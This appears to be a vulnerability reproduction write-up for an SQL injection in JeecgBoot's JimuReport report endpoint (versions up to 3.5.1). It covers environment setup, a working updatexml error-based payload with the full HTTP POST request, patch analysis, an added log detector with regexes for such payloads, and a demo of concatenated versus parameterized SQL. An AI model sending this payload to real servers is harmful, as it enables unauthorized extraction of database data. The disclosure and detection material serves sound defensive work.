Introduction
JeecgBoot's code generator is a tool that helps developers quickly build enterprise-level applications. It generates front-end and back-end code with one click, without writing any code by hand, so developers can concentrate on business logic.
Affected version
Jeecg-Boot<=3.5.1
Environment build
idea+
Backend source code:
https://github.com/jeecgboot/jeecg-boot/archive/refs/tags/v3.5.0.zip
Front-end source code:
https://github.com/jeecgboot/jeecgboot-vue3/archive/refs/tags/v3.5.0.zip
Install npm and Node.js:
https://nodejs.org/dist/v18.16.1/node-v18.16.1-x64.msi
install yarn
npm install -g yarn
download dependencies
yarn install
yarn run serve // start the dev server
Because the front end and back end are separated, the database tables must be imported; this can be done directly with Navicat.
Build the back-end server: import the project into IDEA and adjust the database configuration.
Configure the server-side npm service.
Start it once configured and visit
http://localhost:3100/login
Build successful.
Vulnerability recurrence
The front end and back end are separate; the back end listens on port 8080. Payload:
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Content-Type: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Length: 128
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
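For defenders, the request above is also a detection opportunity: the endpoint is fixed and the error-based payload carries recognisable markers (a quote that breaks out of the string literal, followed by an XML error function such as updatexml). The following Python triage routine is an added example, not code from the original post or from the JeecgBoot project. It assumes a hypothetical application-level request log with one JSON record per line (fields src, method, path, body); the log lines are constructed for the demo and the detection flags both the page's payload and unparseable JSON bodies sent to the report endpoint.

```python
import json
import re
from typing import Dict, List, Optional

# Report query endpoint named in the write-up.
ENDPOINT = "/jeecg-boot/jmreport/qurestSql"

# Constructed sample log (hypothetical format): one JSON record per line.
# Line 1 is the write-up's payload, line 2 is a benign request, line 3 is
# unrelated traffic and line 4 is a malformed body sent to the report endpoint.
SAMPLE_LOG = r"""
{"src": "10.0.0.5", "method": "POST", "path": "/jeecg-boot/jmreport/qurestSql", "body": "{\"apiSelectId\":\"1316997232402231298\",\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '\"}"}
{"src": "10.0.0.6", "method": "POST", "path": "/jeecg-boot/jmreport/qurestSql", "body": "{\"apiSelectId\":\"1316997232402231298\",\"id\":\"42\"}"}
{"src": "10.0.0.7", "method": "GET", "path": "/jeecg-boot/sys/user/list", "body": ""}
{"src": "10.0.0.8", "method": "POST", "path": "/jeecg-boot/jmreport/qurestSql", "body": "not json at all"}
"""

# MySQL XML functions abused for error-based extraction (data is echoed in the error text).
ERROR_FUNCS = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.IGNORECASE)
# A single quote closing a string literal, immediately followed by a boolean connector.
QUOTE_BREAK = re.compile(r"'\s*(or|and)\s", re.IGNORECASE)


def classify_request(record: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return a finding for a suspicious report-endpoint request, or None."""
    if record.get("path") != ENDPOINT or record.get("method") != "POST":
        return None
    try:
        body = json.loads(record.get("body", ""))
    except json.JSONDecodeError:
        # A JSON API receiving a non-JSON body is worth a look on its own.
        return {"src": record.get("src", ""), "reason": "unparseable JSON body"}
    if not isinstance(body, dict):
        return None
    reasons: List[str] = []
    for key, value in body.items():
        if not isinstance(value, str):
            continue
        if ERROR_FUNCS.search(value):
            reasons.append(f"{key}: error-based SQL function")
        if QUOTE_BREAK.search(value):
            reasons.append(f"{key}: quote break with boolean connector")
    if not reasons:
        return None
    return {"src": record.get("src", ""), "reason": "; ".join(reasons)}


def scan_log(text: str) -> List[Dict[str, str]]:
    """Parse newline-delimited JSON records and collect findings in log order."""
    findings: List[Dict[str, str]] = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            record = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip corrupt log lines rather than abort the scan
        finding = classify_request(record)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['src']}: {f['reason']}")
```

The two regexes are deliberately narrow so the routine stays quiet on ordinary report parameters; widen them only with corresponding test lines, since a filter tuned on one payload is a starting point for hunting, not a complete signature.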
Analysis
The vulnerable code lives in the JimuReport (building block report) plug-in. Looking at the 3.5.1 update:
72 files were changed, and it should be noted that the data-insertion method in db/其他数据库/jeecgboot-sqlserver2019.sql was rewritten.
In jeecg-boot-base-core/src/main/java/org/jeecg/common/util/SqlInjectionUtil.java, regular-expression filtering of SQL statements was added.
That fix addresses the back-end SQL injection at /sys/duplicate/check.
Even the latest release, 3.5.1, does not appear to harden the JimuReport component itself; the remediation there is to replace the jar package.
The official JimuReport jar has since been upgraded; see the May entries in the JimuReport changelog:
http://jimureport.com/doc/log
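The fix described above adds regular-expression filtering in SqlInjectionUtil. A pattern filter is a useful extra layer, but the structural remedy for this bug class is to stop splicing caller-controlled values into SQL text at all. The following Python example is added here and is not code from the post or from JeecgBoot/JimuReport: it uses an in-memory SQLite table (a constructed stand-in for a report data source, since SQLite has no updatexml) to show the concatenation pattern next to its parameterized form, with a quote-break value that alters the WHERE clause in the first and is treated as an opaque literal in the second.

```python
import sqlite3
from typing import List, Tuple

# Constructed stand-in for a report data source (hypothetical table and rows).
ROWS = [("1", "quarterly"), ("2", "monthly"), ("3", "weekly")]

# A value whose single quote closes the string literal and appends a tautology.
QUOTE_BREAK = "1' or '' = '"


def make_db() -> sqlite3.Connection:
    """Create the in-memory sample table used by both lookups."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE report_item (id TEXT PRIMARY KEY, label TEXT)")
    conn.executemany("INSERT INTO report_item VALUES (?, ?)", ROWS)
    return conn


def lookup_concat(conn: sqlite3.Connection, item_id: str) -> List[Tuple[str, str]]:
    """Vulnerable pattern: the caller-controlled id is spliced into the SQL text,
    so a quote inside item_id is parsed as SQL and rewrites the WHERE clause."""
    sql = "SELECT id, label FROM report_item WHERE id = '" + item_id + "'"
    return conn.execute(sql).fetchall()


def lookup_param(conn: sqlite3.Connection, item_id: str) -> List[Tuple[str, str]]:
    """Hardened pattern: the id travels as a bound parameter and is never parsed
    as SQL, so the same input simply matches no row."""
    sql = "SELECT id, label FROM report_item WHERE id = ?"
    return conn.execute(sql, (item_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("concat, honest id  :", lookup_concat(db, "1"))
    print("concat, quote break:", lookup_concat(db, QUOTE_BREAK))   # every row
    print("param,  quote break:", lookup_param(db, QUOTE_BREAK))    # no rows
```

The point for reviewers of the 3.5.1 change is that the regex in SqlInjectionUtil guards the text of the query, whereas binding parameters removes the text-level ambiguity that the filter is trying to police.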
Summary
Scripts for this already exist on GitHub, but if you want to run them in batches it is recommended to change how the response is handled: if only operation failures are reported as errors, you will get a large number of error reports.
It is recommended to adjust the output of every custom if-check accordingly; please point out any mistakes.